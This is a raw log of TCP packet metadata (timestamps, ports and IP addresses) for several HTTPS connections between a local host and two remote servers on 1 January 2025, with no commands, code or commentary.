Jan 1, 2025 08:30:44.404850960 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.404860020 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.404863119 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.404908895 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.404912949 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.404923916 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.404933929 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.404937983 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.404987097 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.404992104 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.405009031 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.405019999 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.405024052 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.405077934 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.615326881 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.615498066 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.704989910 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.705003023 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.705014944 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.705022097 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.705064058 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.705069065 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.705100060 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.705110073 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.705121040 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.705136061 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.705140114 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.705173969 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.705178976 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.705189943 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.705210924 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.705214977 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.705223083 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.705240965 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.705281019 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.915348053 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.915431976 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.325853109 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.325869083 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.325882912 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.325977087 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.325977087 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.325983047 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.325995922 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.326004982 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.326097012 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.326102972 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.326114893 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.326123953 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.326203108 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.326203108 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.326210022 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.326220036 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.326225042 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.326579094 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.413049936 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.413058043 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.413069963 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.413078070 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.413255930 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.413263083 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.413278103 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.413286924 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.413455009 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.413464069 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.413606882 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.503181934 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.503204107 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.503281116 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.503300905 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.503710985 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.503717899 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.503732920 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.503740072 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.504046917 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.603403091 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.603413105 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.603426933 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.603435040 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.603570938 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.603579044 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.603594065 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.603600025 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.603629112 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.603704929 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.723815918 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.723829985 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.723845005 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.723848104 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.724045992 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.724052906 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.724070072 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.724210024 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.847351074 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.847364902 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.847379923 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.847383022 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.847532988 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:45.847541094 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.847558975 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:45.847700119 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.059341908 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.059418917 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.445250988 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.445269108 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.445280075 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.445327044 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.445333004 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.445347071 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.445362091 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.445369005 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.445374012 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.445415020 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.445420027 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.445435047 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.445446014 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.445461988 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.445492029 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.445523024 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.601392984 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.601402044 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.601413965 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.601418018 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.601525068 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.601531029 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.601552963 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.601558924 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.601578951 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.601583004 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.602823973 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.602823973 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.602834940 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.602880955 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.751421928 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.751434088 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.751445055 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.751454115 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.751522064 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.751528025 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.751540899 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.751585007 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.751605988 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.751626968 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.751651049 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.897012949 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.897021055 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.897037029 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.897047043 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.897119045 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.897124052 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.897140026 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.897185087 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.897190094 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:46.897244930 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:46.897268057 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.066975117 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.066983938 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.067006111 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.067015886 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.067059994 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.067064047 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.067076921 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.067123890 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.067145109 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.067167044 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.067192078 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.067219973 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.219783068 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.219798088 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.219822884 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.219834089 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.219903946 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.219917059 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.219958067 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.220025063 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.378988028 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.379004002 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.379019022 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.379029989 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.379034996 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.379173040 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.379183054 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.379205942 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.379267931 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.537087917 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.537095070 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.537115097 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.537132025 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.537141085 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.537221909 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.537230015 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.537317038 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.747333050 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.747401953 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.814224958 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.814233065 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.814245939 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.814254999 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.814292908 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.814297915 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.814307928 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.814347982 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.814357996 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.814390898 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.814455032 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.998406887 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.998425007 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.998441935 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.998454094 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.998460054 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.998529911 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.998537064 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.998645067 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:47.998651981 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:47.998709917 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:48.198457956 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:48.198471069 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:48.198482990 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:48.198498964 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:48.198513985 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:48.198523998 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:48.198631048 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:48.373291016 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:48.784955025 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:49.747795105 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:49.747823000 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:49.946398973 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:49.946434021 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:49.946502924 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:49.946719885 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:49.946732998 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.163810968 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.163873911 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.164309025 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.164316893 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.164566994 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.164572001 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.511420965 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.511440992 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.511517048 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.511538982 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.512264967 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.512293100 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.512396097 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.512396097 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.512403965 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.512761116 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.513309002 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.513354063 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.599798918 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.599967957 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.599991083 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.600020885 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.600037098 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.600044012 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.600054026 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.600084066 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.600089073 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.600109100 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.600146055 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.600325108 CET	49742	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.600339890 CET	443	49742	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.617724895 CET	49749	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.617758036 CET	443	49749	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:51.617852926 CET	49749	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.618114948 CET	49749	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:51.618127108 CET	443	49749	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:55.853681087 CET	443	49749	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:55.853754997 CET	49749	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:55.854077101 CET	49749	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:55.854093075 CET	443	49749	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:55.854232073 CET	49749	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:55.854238033 CET	443	49749	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:56.181590080 CET	443	49749	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:56.181607962 CET	443	49749	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:56.181663036 CET	49749	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:56.181683064 CET	443	49749	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:56.181696892 CET	49749	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:56.181724072 CET	49749	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:56.182667971 CET	443	49749	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:56.182733059 CET	49749	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:56.182742119 CET	443	49749	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:56.182751894 CET	443	49749	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:56.182785988 CET	49749	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:56.182992935 CET	49749	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:56.183003902 CET	443	49749	39.103.20.97	192.168.2.4
Jan 1, 2025 08:31:09.342510939 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:09.342539072 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:09.342607975 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:09.350081921 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:09.350097895 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:10.806337118 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:10.806397915 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:10.807101965 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:10.807153940 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:10.871668100 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:10.871674061 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:10.871934891 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:10.872056007 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:10.874826908 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:10.915340900 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.242877007 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.242899895 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.243036985 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.243076086 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.243084908 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.243114948 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.244111061 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.245187044 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.245310068 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.249345064 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.252199888 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.335019112 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.335058928 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.335086107 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.335095882 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.335123062 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.335262060 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.335279942 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.335418940 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.335841894 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.335875988 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.335905075 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.335910082 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.335937023 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.335963011 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.335963964 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:11.336143970 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.336721897 CET	49865	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:11.336726904 CET	443	49865	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:12.604932070 CET	49888	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:12.604962111 CET	443	49888	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:12.605034113 CET	49888	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:12.605259895 CET	49888	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:12.605274916 CET	443	49888	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:13.930744886 CET	443	49888	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:13.930949926 CET	49888	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:13.931494951 CET	49888	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:13.931495905 CET	49888	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:13.931504011 CET	443	49888	118.178.60.9	192.168.2.4
